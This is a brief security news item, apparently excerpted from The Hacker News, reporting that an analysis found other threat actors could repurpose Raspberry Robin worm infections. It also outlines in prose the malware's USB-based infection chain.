New Analysis Reveals Raspberry Robin Can be Repurposed by Other Threat Actors

2023-01-11 17:35

A new analysis of Raspberry Robin's attack infrastructure has revealed that it's possible for other threat actors to repurpose the infections for their own malicious activities, making it an even more potent threat.

Raspberry Robin, attributed to a threat actor dubbed DEV-0856, is malware that has increasingly come under the radar for being used in attacks aimed at finance, government, insurance, and telecom entities.

The attack chain thus unfolds as follows: When a user inserts the USB drive and launches a Windows shortcut file, the msiexec utility is launched, which, in turn, downloads the main obfuscated Raspberry Robin payload from the QNAP instance.

"By pointing this domain to our sinkhole, we were able to obtain telemetry from one of the first domains used by Raspberry Robin operators," the company said, adding it observed several victims, indicating "It was still possible to repurpose a Raspberry Robin domain for malicious activities."

The exact origins of how the first wave of Raspberry Robin USB infections took place remain currently unknown, although it's suspected that it may have been achieved by relying on other malware to disseminate the worm.

This hypothesis is evidenced by the presence of a.NET spreader module that's said to be responsible for distributing Raspberry Robin.

News URL

https://thehackernews.com/2023/01/new-analysis-reveals-raspberry-robin.html

#threat